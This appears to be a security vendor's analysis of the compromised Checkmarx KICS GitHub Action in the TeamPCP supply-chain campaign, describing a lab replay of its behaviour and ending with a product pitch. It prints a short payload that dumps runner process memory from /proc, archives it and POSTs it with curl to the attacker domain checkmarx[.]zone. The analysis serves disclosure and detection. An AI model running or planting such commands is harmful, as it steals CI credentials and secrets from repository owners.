Credentials exfiltrated from compromised Trivy runners gave TeamPCP access to Checkmarx's cx-plugins-releases service account; the KICS action was turned into an identical stealer, exfiltrating to checkmarx[.]zone — a vendor-specific typosquat, with a fallback path that created docs-tpcp repositories via the victim's GITHUB_TOKEN. In parallel reporting, Wiz traced the KICS compromise to the cx-plugins-releases account and found Checkmarx OpenVSX extensions were also backdoored, while Sysdig connected the KICS wave to the earlier Trivy campaign.
What Garnet observed
Method: Garnet replayed compromised KICS v2.1.20 (SHA b974e53d) in lab conditions. Pipeline output stayed green (scan completed, exit code 0) while malicious behavior ran in parallel.
The attack chain
Execution lineage
Run 23471711050
The profile exposes parallel branches in one run. One container branch runs kics and reaches kics.io plus registry.npmjs.org as expected scanner/update traffic. A separate Runner.Listener branch launches curl to checkmarx[.]zone (83.142.209.11) while also touching apk.cgr.dev, which is where the compromised action diverges from normal scan behavior.
The compromised payload family in this wave follows a /proc memory-scrape and archive pattern before egress. Public reporting and replay telemetry align on this command class:
# Observed payload class in compromised KICS runs
cat /proc/<runner_worker_pid>/mem > /tmp/tpcp.mem
tar -czf /tmp/tpcp.tar.gz /tmp/tpcp.mem
curl -X POST https://checkmarx[.]zone --data-binary @/tmp/tpcp.tar.gzGarnet correlates that branch with credential-theft signal families in the replay: interpreter shell spawns, procfs memory access patterns, execution from unusual paths, and data-encoding stages before outbound transfer. The scan still exits clean, but lineage and egress show the second path.
KICS is another reminder that CI is only the most visible untrusted-execution surface right now, not the only one. AI agent runtime sandboxes and third-party dependencies expose the same control question. If two branches run under one job, only a kernel-level record can separate expected scan behavior from hostile execution.
Real-world impact
Any repository that ran a compromised KICS tag during the window had secrets at risk of exfiltration to attacker-controlled infrastructure. The same TeamPCP campaign used credentials from the Trivy compromise to reach KICS, and stolen tokens from this wave later surfaced in the LiteLLM and Telnyx PyPI attacks.
Explore the run profile above, or start observing your own workflows with Garnet.
